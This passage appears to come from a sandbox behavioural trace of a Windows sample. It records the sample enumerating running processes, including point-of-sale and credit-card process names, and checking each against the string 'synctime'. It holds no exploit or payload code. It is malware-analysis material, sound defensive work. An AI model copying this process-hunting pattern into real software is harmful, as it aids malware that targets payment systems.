lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0093.270] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3567210 [0093.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3567210, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0093.270] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0093.270] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="synctime") returned 0x0 [0093.270] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0093.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0093.271] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35671b0 [0093.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x35671b0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0093.271] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0093.271] StrStrIA (lpFirst="creditservice.exe", lpSrch="synctime") returned 0x0 [0093.271] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0093.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.273] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35680a0 [0093.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x35680a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0093.273] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0093.273] StrStrIA (lpFirst="edcsvr.exe", lpSrch="synctime") returned 0x0 [0093.273] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0093.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.274] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3568178 [0093.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3568178, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0093.274] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0093.274] StrStrIA (lpFirst="fpos.exe", lpSrch="synctime") returned 0x0 [0093.274] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0093.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.275] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35681d8 [0093.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x35681d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0093.275] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0093.275] StrStrIA (lpFirst="isspos.exe", lpSrch="synctime") returned 0x0 [0093.275] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0093.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.276] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3567230 [0093.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3567230, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0093.277] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0093.277] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="synctime") returned 0x0 [0093.277] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0093.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.278] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568298 [0093.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3568298, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0093.278] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0093.278] StrStrIA (lpFirst="omnipos.exe", lpSrch="synctime") returned 0x0 [0093.278] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0093.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.279] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568208 [0093.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3568208, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0093.279] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0093.279] StrStrIA (lpFirst="spcwin.exe", lpSrch="synctime") returned 0x0 [0093.279] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0093.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0093.281] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x35672f0 [0093.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x35672f0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0093.281] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0093.281] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="synctime") returned 0x0 [0093.281] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0093.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.282] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3568100 [0093.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3568100, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0093.282] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0093.282] StrStrIA (lpFirst="utg2.exe", lpSrch="synctime") returned 0x0 [0093.282] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0093.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.283] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568040 [0093.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3568040, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0093.283] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0093.283] StrStrIA (lpFirst="saying.exe", lpSrch="synctime") returned 0x0 [0093.284] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0093.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.285] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3568148 [0093.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3568148, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0093.285] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0093.285] StrStrIA (lpFirst="ripe.exe", lpSrch="synctime") returned 0x0 [0093.285] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0093.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.286] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568130 [0093.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3568130, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0093.286] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0093.286] StrStrIA (lpFirst="acoustic.exe", lpSrch="synctime") returned 0x0 [0093.286] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0093.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.287] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3568160 [0093.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3568160, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0093.288] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0093.288] StrStrIA (lpFirst="mail.exe", lpSrch="synctime") returned 0x0 [0093.288] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0093.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.289] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568118 [0093.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3568118, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0093.289] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0093.289] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="synctime") returned 0x0 [0093.289] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.290] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35682b0 [0093.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35682b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.290] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.290] StrStrIA (lpFirst="svchost.exe", lpSrch="synctime") returned 0x0 [0093.290] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0093.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.291] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35682c8 [0093.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x35682c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.291] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0093.292] StrStrIA (lpFirst="dllhost.exe", lpSrch="synctime") returned 0x0 [0093.292] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0093.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.293] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3568238 [0093.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3568238, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0093.293] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0093.293] StrStrIA (lpFirst="taskhostw.exe", lpSrch="synctime") returned 0x0 [0093.293] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0093.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.294] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3568220 [0093.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3568220, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0093.294] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0093.294] StrStrIA (lpFirst="UsoClient.exe", lpSrch="synctime") returned 0x0 [0093.294] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0093.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.295] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3568190 [0093.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3568190, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0093.296] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0093.296] StrStrIA (lpFirst="taskhostw.exe", lpSrch="synctime") returned 0x0 [0093.296] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0093.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0093.297] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3566c30 [0093.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3566c30, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0093.297] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0093.297] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="synctime") returned 0x0 [0093.297] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0093.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.298] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3566f50 [0093.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3566f50, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0093.298] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0093.298] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="synctime") returned 0x0 [0093.298] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0093.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.299] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x35665e8 [0093.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x35665e8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0093.299] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0093.299] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="synctime") returned 0x0 [0093.301] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0093.302] WideCharToMultiByte (in: CodePage=0x0, 